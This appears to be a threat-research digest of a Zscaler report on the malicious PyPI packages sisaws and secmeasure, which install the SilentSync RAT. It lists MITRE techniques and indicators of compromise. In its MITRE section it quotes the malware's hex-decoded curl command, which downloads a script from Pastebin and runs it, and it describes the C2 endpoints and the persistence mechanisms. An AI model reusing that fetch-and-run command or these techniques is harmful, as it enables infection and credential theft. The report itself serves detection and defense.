Threat Research

Malicious PyPI Packages Deliver SilentSync RAT

ZScaler
Malicious PyPI Packages Deliver SilentSync RAT

Zscaler ThreatLabz discovered two malicious PyPI packages, sisaws and secmeasure, that deliver the Python-based RAT SilentSync which provides remote command execution, file exfiltration, screen capture, and browser data theft. The packages use typosquatting and a Pastebin-hosted payload fetched via a hex-decoded curl command, with SilentSync communicating to C2 at 200.58.107[.]25 and the Pastebin raw URL https://pastebin[.]com/raw/jaH2uRE1. #SilentSync #sisaws

Keypoints

  • ThreatLabz identified malicious PyPI packages sisaws and secmeasure in August 2025 that install SilentSync, a Python RAT retrieved from Pastebin.
  • sisaws impersonates the legitimate sisa package (typosquatting) by mimicking modules puco and renaper while embedding a backdoor gen_token function with a hardcoded token.
  • Both packages execute a hex-decoded curl command to download and run helper.py from https://pastebin[.]com/raw/jaH2uRE1, currently targeting Windows installations.
  • SilentSync supports persistence across OSes (Windows registry Run key, Linux crontab @reboot, macOS LaunchAgents) though the PyPI installers only infect Windows.
  • SilentSync’s features include remote command execution, file/directory exfiltration (ZIP support), screenshot capture, and browser data theft (credentials, cookies, history, autofill) from Chromium-family browsers and Firefox.
  • Network C2 uses HTTP REST endpoints (/checkin, /comando, /respuesta, /archivo) over TCP port 5000 to an IP address 200.58.107[.]25 decoded from Base64.
  • IOC artifacts documented include package MD5 hashes for sisaws and secmeasure, the SilentSync sample hash, the Pastebin raw URL, and the hardcoded C2 IP address.

MITRE Techniques

  • [T1547 ] Boot or Logon Autostart Scripts – Enables persistence by creating OS-specific autostart mechanisms: “On Windows, SilentSync creates a registry entry under HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun key with the name PyHelper… On Linux, SilentSync modifies the crontab with an @reboot directive… For macOS, SilentSync generates a com.apple.pyhelper.plist file in the ~/Library/LaunchAgents directory.”
  • [T1555 ] Credentials from Password Stores – Extracts stored browser credentials and other browser data: “SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”
  • [T1071 ] Application Layer Protocol – C2 communication over HTTP using a REST API: “SilentSync communicates with its C2 server over HTTP to a hardcoded server whose IP address (200.58.107[.]25) is stored in Base64… The REST endpoints…/checkin /comando /respuesta /archivo.”
  • [T1140 ] Deobfuscate/Decode Files or Information – Decodes or deobfuscates payload retrieval commands and payloads at runtime: “If the correct token is provided, the code will decode a hexadecimal string that reveals a curl command… curl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%helper.py && python %TEMP%helper.py.”
  • [T1082 ] System Information Discovery – Collects system information to inform actions: “SilentSync is capable of harvesting browser data, executing shell commands, capturing screenshots, and stealing files,” which implies system discovery to tailor further actions.

Indicators of Compromise

  • [MD5 ] PyPI package samples – Sisaws package MD5: 327233d73236ca4d7c18ffd8f9924127; Secmeasure package MD5: 9a092bbfc5325cbfca2f9807d074616a.
  • [MD5 ] Malware sample – SilentSync RAT MD5: 3918cace55342909c8309ec37d0207fd.
  • [URL ] Payload download – Pastebin raw URL used to fetch helper.py: https://pastebin[.]com/raw/jaH2uRE1.
  • [IP ] Command-and-control server – Hardcoded C2 IP: 200.58.107[.]25 (C2 over HTTP, REST API on port 5000).
  • [File/Path ] Temporary helper script – helper.py written to %TEMP%helper.py after curl download (Windows execution context).

Read more: https://www.zscaler.com/blogs/security-research/malicious-pypi-packages-deliver-silentsync-rat